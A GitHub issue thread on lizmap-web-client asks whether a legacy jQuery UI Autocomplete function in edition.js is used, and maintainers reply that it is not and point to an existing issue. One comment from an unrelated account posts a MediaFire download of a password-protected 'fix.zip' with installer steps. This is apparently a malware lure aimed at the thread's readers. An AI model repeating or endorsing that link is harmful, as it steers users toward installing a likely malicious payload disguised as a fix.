### ISSUE TITLE
[Question]: jQuery UI Autocomplete

### ISSUE THREAD

**Issue by mind84** [3liz/lizmap-web-client#4709]
### What is the question? (in English)

Is this feature used or is it planned to be used in the future? 

https://github.com/3liz/lizmap-web-client/blob/829b42cacdf169d515c76d2652be2ce7439efcf8/assets/src/legacy/edition.js#L1511

If it is used, do you have any examples?

As note, I totally agree with this https://github.com/3liz/lizmap-web-client/issues/1678, so I guess that there is no plan for the future.

@rldhont, @nboisteault

Thanks a lot!

### Versions, safeguards, check summary etc

**Versions :**

* Lizmap Web Client : 3.9.0-pre
* Lizmap plugin : 4.3.20
* QGIS Desktop : 3.34.3
* QGIS Server : 3.34.8
* Py-QGIS-Server : 1.8.8
* QGIS Server plugin atlasprint : 3.3.2
* QGIS Server plugin lizmap_server : 2.9.4
* QGIS Server plugin wfsOutputExtension : 1.8.0

<details>
<summary>List of safeguards :</summary>
<br/>

* Mode : normal
* Allow parent folder : yes
* Number of parent : 7 folder(s)
* Prevent other drive : no
* Prevent PG service : no
* Prevent PG Auth DB : no
* Force PG user&pass : no
* Prevent ECW : no
</details>

### Check Lizmap plugin

- [X] I have done the step just before in the Lizmap QGIS desktop plugin before opening this ticket. Otherwise, my ticket is not considered valid and might get closed.

### Operating system

Debian

### Browsers

Firefox, Chrome

### Browsers version

latest

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Gustry** [comment]
There isn't any occurrence on GitHub 3Liz repositories : https://github.com/search?q=org%3A3liz%20activateAutocomplete&type=code

**Comment by mind84** [comment]
I think I used for `Unique Values` widget configuration ma apparently does not work on client side.

Thanks

**Comment by nboisteault** [comment]
I'd like to use something else for autocomplete as there are performance issues with it. For example, when there is a lot of values for the location tool.

**Comment by Gustry** [comment]
Can we close here ?
There is already https://github.com/3liz/lizmap-web-client/issues/1678
